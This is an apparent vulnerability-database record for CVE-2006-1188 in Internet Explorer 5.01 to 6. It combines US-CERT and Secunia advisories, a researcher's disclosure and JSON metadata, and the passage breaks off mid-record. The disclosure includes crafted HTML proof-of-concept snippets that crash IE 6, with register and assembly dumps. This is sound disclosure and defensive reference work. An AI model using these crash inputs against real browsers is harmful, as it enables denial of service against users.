618 vulnerabilities found for ie by microsoft
VAR-200604-0201
Vulnerability from variot - Updated: 2024-07-23 22:05
Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption.
------------
This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA06-101A
Microsoft Windows and Internet Explorer Vulnerabilities
Original release date: April 11, 2006
Last revised: --
Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
For more complete information, refer to the Microsoft Security Bulletin Summary for April 2006.
I. (CVE-2006-0012)
II. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. An attacker may also be able to cause a denial of service.
III. Solution
Apply Updates
Microsoft has provided updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the US-CERT Vulnerability Notes for workarounds. Many of these vulnerabilities can be mitigated by following the instructions listed in the Securing Your Web Browser document.
Appendix A. Please send email to cert@cert.org with "TA06-101A Feedback VU#876678" in the subject.
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
Apr 11, 2006: Initial release
Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Memory Corruption Vulnerability: <mshtml.dll>#7d519030
Following HTML code forces IE 6 to crash:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
</h6 </ul
Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html
These are the register values and the ASM dump at the time of the access violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894
7d519012 55              push    ebp
7d519013 8bec            mov     ebp,esp
7d519015 8b4104          mov     eax,[ecx+0x4]
7d519018 394508          cmp     [ebp+0x8],eax
7d51901b 7c09            jl      mshtml+0x69026 (7d519026)
7d51901d 7edc            jle     mshtml+0x68ffb (7d518ffb)
7d51901f 33c0            xor     eax,eax
7d519021 40              inc     eax
7d519022 5d              pop     ebp
7d519023 c20800          ret     0x8
7d519026 83c8ff          or      eax,0xffffffff
7d519029 ebf7            jmp     mshtml+0x69022 (7d519022)
7d51902b 90              nop
7d51902c 90              nop
7d51902d 90              nop
7d51902e 90              nop
7d51902f 90              nop
FAULT ->7d519030 8b4108  mov     eax,[ecx+0x8] ds:0023:00000008=????????
7d519033 85c0            test    eax,eax
7d519035 7425            jz      mshtml+0x6905c (7d51905c)
7d519037 8b10            mov     edx,[eax]
7d519039 f6c210          test    dl,0x10
7d51903c 7408            jz      mshtml+0x69046 (7d519046)
7d51903e f6c220          test    dl,0x20
7d519041 7519            jnz     mshtml+0x6905c (7d51905c)
7d519043 8b400c          mov     eax,[eax+0xc]
7d519046 8b4808          mov     ecx,[eax+0x8]
7d519049 85c9            test    ecx,ecx
o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35
Following HTML code forces IE 6 to crash:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
</code
</style </td </label </bdo </th </object
Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html
These are the register values and the ASM dump at the time of the access violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778
7d529d0e e811170000          call    mshtml+0x7b424 (7d52b424)
7d529d13 85c0                test    eax,eax
7d529d15 0f85c5500800        jne     mshtml!DllGetClassObject+0x10fa2 (7d5aede0)
7d529d1b 0fb65508            movzx   edx,byte ptr [ebp+0x8]
7d529d1f 8d849680000000      lea     eax,[esi+edx*4+0x80]
7d529d26 5e                  pop     esi
7d529d27 5d                  pop     ebp
7d529d28 c20c00              ret     0xc
7d529d2b 90                  nop
7d529d2c 90                  nop
7d529d2d 90                  nop
7d529d2e 90                  nop
7d529d2f 90                  nop
7d529d30 8bff                mov     edi,edi
7d529d32 55                  push    ebp
7d529d33 8bec                mov     ebp,esp
FAULT ->7d529d35 0fbe4114    movsx   eax,byte ptr [ecx+0x14] ds:0023:00000014=??
7d529d39 c1e004              shl     eax,0x4
7d529d3c 0578aa4b7d          add     eax,0x7d4baa78
7d529d41 7410                jz      mshtml+0x79d53 (7d529d53)
7d529d43 8b400c              mov     eax,[eax+0xc]
7d529d46 234508              and     eax,[ebp+0x8]
7d529d49 f7d8                neg     eax
7d529d4b 1bc0                sbb     eax,eax
7d529d4d f7d8                neg     eax
7d529d4f 5d                  pop     ebp
7d529d50 c20400              ret     0x4
7d529d53 33c0                xor     eax,eax
7d529d55 ebf8                jmp     mshtml+0x79d4f (7d529d4f)
o Vulnerable versions:
The DoS vulnerability was successfully tested on:
MS IE 6 SP2 - Win XP Pro SP2
MS IE 6 - Win 2k SP4
o Disclosure Timeline:
xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.
o Solution:
Install the latest security update (MS06-013) for Internet Explorer [2].
o Credits:
Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq@morph3us.org' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me.
Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa.
TITLE: Microsoft Design Tools msdds.dll Code Execution Vulnerability
SECUNIA ADVISORY ID: SA16480
VERIFY ADVISORY: http://secunia.com/advisories/16480/
CRITICAL: Highly critical
IMPACT: System access
WHERE:
From remote
SOFTWARE:
Microsoft Visual Studio .NET 2003
http://secunia.com/product/1086/
Microsoft Office 2003 Student and Teacher Edition
http://secunia.com/product/2278/
Microsoft Office 2003 Standard Edition
http://secunia.com/product/2275/
Microsoft Internet Explorer 5.01
http://secunia.com/product/9/
Microsoft Internet Explorer 5.5
http://secunia.com/product/10/
Microsoft Internet Explorer 6.x
http://secunia.com/product/11/
Microsoft Office 2003 Professional Edition
http://secunia.com/product/2276/
Microsoft Office 2003 Small Business Edition
http://secunia.com/product/2277/
DESCRIPTION: A vulnerability has been reported in Microsoft Visual Studio .NET, which potentially can be exploited by malicious people to compromise a vulnerable system.
The COM object is known to be installed as part of the following products:
* Microsoft Visual Studio .NET 2003
* Microsoft Office Professional 2003
Other products may also include the affected COM object.
NOTE: An exploit has been published. However, there are currently conflicting reports about the exploitability of this issue. Some reports confirm that code execution is possible, while other reports indicate that the problem can't be reproduced. Secunia has currently not been able to reproduce the vulnerability in version 7.10.3077.0 of the COM object.
This advisory will be updated when more information is available.
SOLUTION: Restrict use of ActiveX controls to trusted web sites only.
PROVIDED AND/OR DISCOVERED BY: Reported by anonymous person.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200604-0201",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 7.2,
"vendor": "microsoft",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.2.3"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "none"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(itanium)"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "sp3"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:preview:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.1:*:mac_os:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.2.3:*:macintosh:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thomas Waldegger\u203b bugtraq@morph3us.org",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
}
],
"trust": 0.6
},
"cve": "CVE-2006-1188",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2006-1188",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-17296",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-1188",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#876678",
"trust": 0.8,
"value": "35.63"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#680526",
"trust": 0.8,
"value": "28.35"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#984473",
"trust": 0.8,
"value": "23.01"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#824324",
"trust": 0.8,
"value": "13.77"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#641460",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#341028",
"trust": 0.8,
"value": "32.40"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#434641",
"trust": 0.8,
"value": "25.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#740372",
"trust": 0.8,
"value": "10.13"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#939605",
"trust": 0.8,
"value": "44.55"
},
{
"author": "CNNVD",
"id": "CNNVD-200604-164",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-17296",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n\n National Cyber Alert System\n\n Technical Cyber Security Alert TA06-101A\n\n\nMicrosoft Windows and Internet Explorer Vulnerabilities\n\n Original release date: April 11, 2006\n Last revised: --\n Source: US-CERT\n\n\nSystems Affected\n\n * Microsoft Windows\n * Microsoft Internet Explorer\n\n For more complete information, refer to the Microsoft Security\n Bulletin Summary for April 2006. \n\n\nI. \n (CVE-2006-0012)\n\n\nII. If the user is logged on with\n administrative privileges, the attacker could take complete control of\n an affected system. An attacker may also be able to cause a denial of\n service. \n\n\nIII. Solution\n\nApply Updates\n\n Microsoft has provided updates for these vulnerabilities in the\n Security Bulletins and on the Microsoft Update site. \n\nWorkarounds\n\n Please see the US-CERT Vulnerability Notes for workarounds. Many of\n these vulnerabilities can be mitigated by following the instructions\n listed in the Securing Your Web Browser document. \n\nAppendix A. 
Please send\n email to \u003ccert@cert.org\u003e with \"TA06-101A Feedback VU#876678\" in the\n subject. \n ____________________________________________________________________\n\n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n ____________________________________________________________________\n\n Produced 2006 by US-CERT, a government organization. \n\n Terms of use:\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n ____________________________________________________________________\n\n\nRevision History\n\n Apr 11, 2006: Initial release\n\n\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt\nCg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+\nolQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM\ni+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I\nR+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh\nHAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA==\n=w6IC\n-----END PGP SIGNATURE-----\n. \n\nVisit http://www.microsoft.com/windows/ie/default.mspx or\nhttp://en.wikipedia.org/wiki/Internet_Explorer for detailed information. 
\n\no Memory Corruption Vulnerability: \u003cmshtml.dll\u003e#7d519030\n=================================\n\nFollowing HTML code forces IE 6 to crash:\n\u003e \u003c!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"\n\u003e \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"\u003e\n\u003e \u003chtml\u003e \u003cfieldset\u003e \u003ch4\u003e\n\u003e \u003cpre\u003e\u003ctd\u003e\n\u003e \u003cmenu\u003e\n\u003e \u003clegend\u003e\n\u003e \u003ca\u003e\n\u003e \u003cul\u003e\n\u003e \u003csmall\u003e\n\u003e \u003cfieldset\u003e\n\u003e \u003ch6\u003e\n\u003e \u003c/h6\n\u003e \u003c/u\u003e\n\u003e \u003c/optgroup\u003e\n\u003e \u003c/tr\u003e\n\u003e \u003c/map\u003e\n\u003e \u003c/ul\n\u003e \u003c/dfn\u003e\n\u003e\n\u003e \u003c/del\u003e\n\u003e \u003c/h2\u003e\n\u003e \u003c/dir\u003e\n\u003e \u003c/ul\u003e\n\nOnline-demo:\nhttp://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html\n\nThese are the register values and the ASM dump at the time of the access\nviolation:\n\u003e eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000\n\u003e edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894\n\u003e\n\u003e 7d519012 55 push ebp\n\u003e 7d519013 8bec mov ebp,esp\n\u003e 7d519015 8b4104 mov eax,[ecx+0x4]\n\u003e 7d519018 394508 cmp [ebp+0x8],eax\n\u003e 7d51901b 7c09 jl mshtml+0x69026 (7d519026)\n\u003e 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb)\n\u003e 7d51901f 33c0 xor eax,eax\n\u003e 7d519021 40 inc eax\n\u003e 7d519022 5d pop ebp\n\u003e 7d519023 c20800 ret 0x8\n\u003e 7d519026 83c8ff or eax,0xffffffff\n\u003e 7d519029 ebf7 jmp mshtml+0x69022 (7d519022)\n\u003e 7d51902b 90 nop\n\u003e 7d51902c 90 nop\n\u003e 7d51902d 90 nop\n\u003e 7d51902e 90 nop\n\u003e 7d51902f 90 nop\n\u003e FAULT -\u003e7d519030 8b4108 mov eax,[ecx+0x8]\n\u003e ds:0023:00000008=????????\n\u003e 7d519033 85c0 test eax,eax\n\u003e 7d519035 7425 jz mshtml+0x6905c (7d51905c)\n\u003e 7d519037 8b10 mov edx,[eax]\n\u003e 7d519039 f6c210 test 
dl,0x10\n\u003e 7d51903c 7408 jz mshtml+0x69046 (7d519046)\n\u003e 7d51903e f6c220 test dl,0x20\n\u003e 7d519041 7519 jnz mshtml+0x6905c (7d51905c)\n\u003e 7d519043 8b400c mov eax,[eax+0xc]\n\u003e 7d519046 8b4808 mov ecx,[eax+0x8]\n\u003e 7d519049 85c9 test ecx,ecx\n\no Memory Corruption Vulnerability: \u003cmshtml.dll\u003e#7d529d35\n=================================\n\nFollowing HTML code forces IE 6 to crash:\n\u003e \u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\u003e \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n\u003e \u003cbdo\u003e\n\u003e \u003c/span\u003e\n\u003e \u003cpre\u003e\n\u003e\n\u003e \u003cparam\u003e\n\u003e \u003cform\u003e\n\u003e \u003ccolgroup\u003e\n\u003e \u003csmall\u003e\n\u003e \u003c/small\u003e\n\u003e \u003c/colgroup\u003e\n\u003e \u003c/map\u003e\n\u003e \u003c/button\u003e\n\u003e \u003c/code\n\u003e\n\u003e \u003cblockquote\u003e\n\u003e \u003cth\u003e\n\u003e \u003csmall\u003e\n\u003e\n\u003e \u003c/tbody\u003e\n\u003e \u003c/tr\u003e\n\u003e \u003c/ol\u003e\n\u003e \u003c/tbody\u003e\n\u003e \u003c/ol\u003e\n\u003e \u003c/code\u003e\n\u003e \u003c/strong\u003e\n\u003e\n\u003e\n\u003e \u003chead\u003e\n\u003e \u003cfieldset\u003e\n\u003e \u003cstyle\u003e\n\u003e\n\u003e \u003c/style\n\u003e \u003c/dir\u003e\n\u003e \u003c/a\u003e\n\u003e \u003c/td\n\u003e \u003c/li\u003e\n\u003e \u003c/label\n\u003e \u003c/object\u003e\n\u003e \u003c/bdo\n\u003e \u003c/th\n\u003e \u003c/object\n\u003e \u003c/q\u003e\n\u003e\n\u003e \u003col\u003e\n\u003e \u003cobject\u003e\n\nOnline-demo:\nhttp://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html\n\nThese are the register values and the ASM dump at the time of the access\nviolation:\n\u003e eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0\n\u003e edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778\n\u003e\n\u003e 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424)\n\u003e 7d529d13 85c0 test eax,eax\n\u003e 7d529d15 0f85c5500800 
